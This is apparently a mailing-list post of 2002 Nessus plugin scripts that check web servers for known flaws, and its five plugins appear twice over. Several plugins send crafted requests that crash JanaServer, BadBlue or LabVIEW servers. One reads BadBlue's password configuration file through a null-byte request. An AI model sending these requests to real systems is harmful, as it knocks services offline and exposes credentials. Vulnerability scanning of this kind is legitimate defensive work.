I think that they are correct (i.e. implement what was described in the
advisories) but I do not guarantee that they are really usefull (i.e.
that the advisory was right)
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# Date: Fri, 26 Jul 2002 12:12:45 +0400
# From: "3APA3A" <3APA3A@SECURITY.NNOV.RU>
# To: bugtraq@securityfocus.com
# Subject: SECURITY.NNOV: multiple vulnerabilities in JanaServer
#
# Affected:
# JanaServer 2.2.1 and prior
# JanaServer 1.46 and prior
#
if(description)
{
#script_id(TBD);
script_version ("$Revision$");
name["english"] = "HTTP version number overflow";
script_name(english:name["english"]);
desc["english"] = "It was possible to kill the web server by
sending an invalid GET request with a too long HTTP version field
A cracker may exploit this vulnerability to make your web server
crash continually or even execute arbirtray code on your system.
Workaround : upgrade your software or protect it with a filtering reverse proxy
Risk factor : High");
script_description(english:desc["english"]);
summary["english"] = "too long HTTP version kills the web server";
script_summary(english:summary["english"]);
script_category(ACT_DESTRUCTIVE_ATTACK);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "Denial of Service";
script_family(english:family["english"]);
script_require_ports("Services/www", 80);
exit(0);
}
########
if (safe_checks()) exit(0);
r = string("GET / HTTP/", crap(2048), ".O\r\n\r\n");
port = get_kb_item("Services/www");
if(!port) port = 80;
if(! get_port_state(port)) exit(0);
soc = http_open_socket(port);
if(! soc) exit(0);
send(socket:soc, data: r);
r = recv(socket:soc, length:4096);
close(soc);
sleep(1);
soc = open_sock_tcp(port);
if(!soc) { security_hole(port); exit(0); }
close(soc);
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
#
# References:
# Date: Mon, 11 Mar 2002 12:46:06 +0700
# From: "Fyodor" <fyarochkin@trusecure.com>
# To: bugtraq@securityfocus.com
# Subject: SunSolve CD cgi scripts...
#
# Date: Sat, 16 Jun 2001 23:24:45 +0700
# From: Fyodor <fyodor@relaygroup.com>
# To: security-alert@sun.com
# Subject: SunSolve CD security problems..
#
if(description)
{
#script_id(TBD);
script_version("$Revision$");
name["english"] = "SunSolve CD CGI user input validation";
script_name(english:name["english"]);
desc["english"] = "
Sunsolve CD CGI scripts does not validate user input.
Crackers may use them to execute some commands on your system.
** Note: Nessus did not try to perform the attack.
Risk factor : High";
script_description(english:desc["english"]);
summary["english"] = "SunSolve CD CGI scripts are vulnerable to a few user
input validation problems";
script_summary(english:summary["english"]);
script_category(ACT_ATTACK);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "CGI abuses";
script_family(english:family["english"]);
script_dependencie("find_service.nes", "http_version.nasl");
script_require_ports("Services/www", 8383);
exit(0);
}
#
port = get_kb_item("Services/www");
if(!port) port = 8383;
if (is_cgi_installed(port: port, item:"/cd-cgi/sscd_suncourier.pl")) {
security_warning(port);
exit(0);
}
if (is_cgi_installed(port: port, item:"sscd_suncourier.pl")) {
security_warning(port);
exit(0);
}
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# From: "Matthew Murphy" <mattmurphy@kc.rr.com>
# To: full-disclosure@lists.netsys.com,
# "SecurITeam News" <news@securiteam.com>, bugtraq@securityfocus.com
# Subject: Three BadBlue Vulnerabilities
# Date: Fri, 12 Jul 2002 19:50:16 -0500
#
if(description)
{
#script_id(TBD);
script_version ("$Revision$");
name["english"] = "BadBlue invalid GET DoS";
script_name(english:name["english"]);
desc["english"] = "It was possible to kill the web server by
sending an invalid GET request (without any URI)
A cracker may exploit this vulnerability to make your web server
crash continually.
Workaround : upgrade your software or protect it with a filtering reverse proxy
Risk factor : Low");
script_description(english:desc["english"]);
summary["english"] = "Invalid GET kills the BadBlue web server";
script_summary(english:summary["english"]);
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "Denial of Service";
script_family(english:family["english"]);
script_require_ports("Services/www", 80);
exit(0);
}
########
if (safe_checks()) exit(0);
r1 = string("GET HTTP/1.0\r\n\r\n");
r2 = string("GET HTTP/1.0\r\n\r\n");
port = get_kb_item("Services/www");
if(!port)port = 80;
if(! get_port_state(port)) exit(0);
soc = http_open_socket(port);
if(! soc) exit(0);
send(socket:soc, data: r1);
r = recv(socket:soc, length:1024);
close(soc);
sleep(1);
soc = open_sock_tcp(port);
if(!soc) { security_hole(port); exit(0); }
send(socket:soc, data: r2);
r = recv(socket:soc, length:1024);
close(soc);
sleep(1);
soc = open_sock_tcp(port);
if(!soc) { security_hole(port); exit(0); }
close(soc);
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# From: "Matthew Murphy" <mattmurphy@kc.rr.com>
# To: full-disclosure@lists.netsys.com,
# "SecurITeam News" <news@securiteam.com>, bugtraq@securityfocus.com
# Subject: Three BadBlue Vulnerabilities
# Date: Fri, 12 Jul 2002 19:50:16 -0500
#
if(description)
{
#script_id(TBD);
script_version ("$Revision$");
name["english"] = "BadBlue invalid null byte vulnerability";
script_name(english:name["english"]);
desc["english"] = "It was possible to read the content of /EXT.INI
(BadBlue configuration file) by sending an invalid GET request.
A cracker may exploit this vulnerability to steal the passwords.
Workaround : upgrade your software or protect it with a filtering reverse proxy
Risk factor : Medium");
script_description(english:desc["english"]);
summary["english"] = "Read BadBlue protected configuration file";
script_summary(english:summary["english"]);
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "CGI abuses";
script_family(english:family["english"]);
script_require_ports("Services/www", 80);
exit(0);
}
########
r = string("GET /ext.ini.% 00.txt HTTP/1.0\r\n\r\n");
port = get_kb_item("Services/www");
if(!port) port = 80;
if(! get_port_state(port)) exit(0);
soc = http_open_socket(port);
if(! soc) exit(0);
send(socket:soc, data: r);
l = recv_line(socket:soc, length:1024);
close(soc);
if (" 200 " >< l) security_hole(port);
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# From: "Steve Zins" <steve@iLabVIEW.com>
# To: bugtraq@securityfocus.com
# Subject: LabVIEW Web Server DoS Vulnerability
# Date: Mon, 22 Apr 2002 22:51:39 -0700
#
if(description)
{
#script_id(TBD);
script_version ("$Revision$");
name["english"] = "LabView web server DoS";
script_name(english:name["english"]);
desc["english"] = "It was possible to kill the web server by
sending a request that ends with two LF characters instead of
the normal sequence CR LF CR LF
(CR = carriage return, LF = line feed).
A cracker may exploit this vulnerability to make this server and
all LabViews applications crash continually.
Workaround : upgrade your LabView software or run the web server with logging
disabled
Risk factor : Low");
script_description(english:desc["english"]);
summary["english"] = "Kills the LabView web server";
script_summary(english:summary["english"]);
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "Denial of Service";
script_family(english:family["english"]);
script_require_ports("Services/www", 80);
exit(0);
}
########
if (safe_checks()) exit(0);
data = string("GET / HTTP/1.0\n\n");
port = get_kb_item("Services/www");
if(!port)port = 80;
if(get_port_state(port))
{
soc = http_open_socket(port);
if(soc)
{
send(socket:soc, data:data);
r = recv(socket:soc, length:1024);
close(soc);
sleep(1);
soc2 = open_sock_tcp(port);
#display(string("Alive!\n"));
if(!soc2)security_hole(port);
else close(soc2);
}
}
advisories) but I do not guarantee that they are really usefull (i.e.
that the advisory was right)
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# Date: Fri, 26 Jul 2002 12:12:45 +0400
# From: "3APA3A" <3APA3A@SECURITY.NNOV.RU>
# To: bugtraq@securityfocus.com
# Subject: SECURITY.NNOV: multiple vulnerabilities in JanaServer
#
# Affected:
# JanaServer 2.2.1 and prior
# JanaServer 1.46 and prior
#
if(description)
{
#script_id(TBD);
script_version ("$Revision$");
name["english"] = "HTTP version number overflow";
script_name(english:name["english"]);
desc["english"] = "It was possible to kill the web server by
sending an invalid GET request with a too long HTTP version field
A cracker may exploit this vulnerability to make your web server
crash continually or even execute arbirtray code on your system.
Workaround : upgrade your software or protect it with a filtering reverse proxy
Risk factor : High");
script_description(english:desc["english"]);
summary["english"] = "too long HTTP version kills the web server";
script_summary(english:summary["english"]);
script_category(ACT_DESTRUCTIVE_ATTACK);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "Denial of Service";
script_family(english:family["english"]);
script_require_ports("Services/www", 80);
exit(0);
}
########
if (safe_checks()) exit(0);
r = string("GET / HTTP/", crap(2048), ".O\r\n\r\n");
port = get_kb_item("Services/www");
if(!port) port = 80;
if(! get_port_state(port)) exit(0);
soc = http_open_socket(port);
if(! soc) exit(0);
send(socket:soc, data: r);
r = recv(socket:soc, length:4096);
close(soc);
sleep(1);
soc = open_sock_tcp(port);
if(!soc) { security_hole(port); exit(0); }
close(soc);
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
#
# References:
# Date: Mon, 11 Mar 2002 12:46:06 +0700
# From: "Fyodor" <fyarochkin@trusecure.com>
# To: bugtraq@securityfocus.com
# Subject: SunSolve CD cgi scripts...
#
# Date: Sat, 16 Jun 2001 23:24:45 +0700
# From: Fyodor <fyodor@relaygroup.com>
# To: security-alert@sun.com
# Subject: SunSolve CD security problems..
#
if(description)
{
#script_id(TBD);
script_version("$Revision$");
name["english"] = "SunSolve CD CGI user input validation";
script_name(english:name["english"]);
desc["english"] = "
Sunsolve CD CGI scripts does not validate user input.
Crackers may use them to execute some commands on your system.
** Note: Nessus did not try to perform the attack.
Risk factor : High";
script_description(english:desc["english"]);
summary["english"] = "SunSolve CD CGI scripts are vulnerable to a few user
input validation problems";
script_summary(english:summary["english"]);
script_category(ACT_ATTACK);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "CGI abuses";
script_family(english:family["english"]);
script_dependencie("find_service.nes", "http_version.nasl");
script_require_ports("Services/www", 8383);
exit(0);
}
#
port = get_kb_item("Services/www");
if(!port) port = 8383;
if (is_cgi_installed(port: port, item:"/cd-cgi/sscd_suncourier.pl")) {
security_warning(port);
exit(0);
}
if (is_cgi_installed(port: port, item:"sscd_suncourier.pl")) {
security_warning(port);
exit(0);
}
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# From: "Matthew Murphy" <mattmurphy@kc.rr.com>
# To: full-disclosure@lists.netsys.com,
# "SecurITeam News" <news@securiteam.com>, bugtraq@securityfocus.com
# Subject: Three BadBlue Vulnerabilities
# Date: Fri, 12 Jul 2002 19:50:16 -0500
#
if(description)
{
#script_id(TBD);
script_version ("$Revision$");
name["english"] = "BadBlue invalid GET DoS";
script_name(english:name["english"]);
desc["english"] = "It was possible to kill the web server by
sending an invalid GET request (without any URI)
A cracker may exploit this vulnerability to make your web server
crash continually.
Workaround : upgrade your software or protect it with a filtering reverse proxy
Risk factor : Low");
script_description(english:desc["english"]);
summary["english"] = "Invalid GET kills the BadBlue web server";
script_summary(english:summary["english"]);
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "Denial of Service";
script_family(english:family["english"]);
script_require_ports("Services/www", 80);
exit(0);
}
########
if (safe_checks()) exit(0);
r1 = string("GET HTTP/1.0\r\n\r\n");
r2 = string("GET HTTP/1.0\r\n\r\n");
port = get_kb_item("Services/www");
if(!port)port = 80;
if(! get_port_state(port)) exit(0);
soc = http_open_socket(port);
if(! soc) exit(0);
send(socket:soc, data: r1);
r = recv(socket:soc, length:1024);
close(soc);
sleep(1);
soc = open_sock_tcp(port);
if(!soc) { security_hole(port); exit(0); }
send(socket:soc, data: r2);
r = recv(socket:soc, length:1024);
close(soc);
sleep(1);
soc = open_sock_tcp(port);
if(!soc) { security_hole(port); exit(0); }
close(soc);
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# From: "Matthew Murphy" <mattmurphy@kc.rr.com>
# To: full-disclosure@lists.netsys.com,
# "SecurITeam News" <news@securiteam.com>, bugtraq@securityfocus.com
# Subject: Three BadBlue Vulnerabilities
# Date: Fri, 12 Jul 2002 19:50:16 -0500
#
if(description)
{
#script_id(TBD);
script_version ("$Revision$");
name["english"] = "BadBlue invalid null byte vulnerability";
script_name(english:name["english"]);
desc["english"] = "It was possible to read the content of /EXT.INI
(BadBlue configuration file) by sending an invalid GET request.
A cracker may exploit this vulnerability to steal the passwords.
Workaround : upgrade your software or protect it with a filtering reverse proxy
Risk factor : Medium");
script_description(english:desc["english"]);
summary["english"] = "Read BadBlue protected configuration file";
script_summary(english:summary["english"]);
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "CGI abuses";
script_family(english:family["english"]);
script_require_ports("Services/www", 80);
exit(0);
}
########
r = string("GET /ext.ini.% 00.txt HTTP/1.0\r\n\r\n");
port = get_kb_item("Services/www");
if(!port) port = 80;
if(! get_port_state(port)) exit(0);
soc = http_open_socket(port);
if(! soc) exit(0);
send(socket:soc, data: r);
l = recv_line(socket:soc, length:1024);
close(soc);
if (" 200 " >< l) security_hole(port);
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# From: "Steve Zins" <steve@iLabVIEW.com>
# To: bugtraq@securityfocus.com
# Subject: LabVIEW Web Server DoS Vulnerability
# Date: Mon, 22 Apr 2002 22:51:39 -0700
#
if(description)
{
#script_id(TBD);
script_version ("$Revision$");
name["english"] = "LabView web server DoS";
script_name(english:name["english"]);
desc["english"] = "It was possible to kill the web server by
sending a request that ends with two LF characters instead of
the normal sequence CR LF CR LF
(CR = carriage return, LF = line feed).
A cracker may exploit this vulnerability to make this server and
all LabViews applications crash continually.
Workaround : upgrade your LabView software or run the web server with logging
disabled
Risk factor : Low");
script_description(english:desc["english"]);
summary["english"] = "Kills the LabView web server";
script_summary(english:summary["english"]);
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "Denial of Service";
script_family(english:family["english"]);
script_require_ports("Services/www", 80);
exit(0);
}
########
if (safe_checks()) exit(0);
data = string("GET / HTTP/1.0\n\n");
port = get_kb_item("Services/www");
if(!port)port = 80;
if(get_port_state(port))
{
soc = http_open_socket(port);
if(soc)
{
send(socket:soc, data:data);
r = recv(socket:soc, length:1024);
close(soc);
sleep(1);
soc2 = open_sock_tcp(port);
#display(string("Alive!\n"));
if(!soc2)security_hole(port);
else close(soc2);
}
}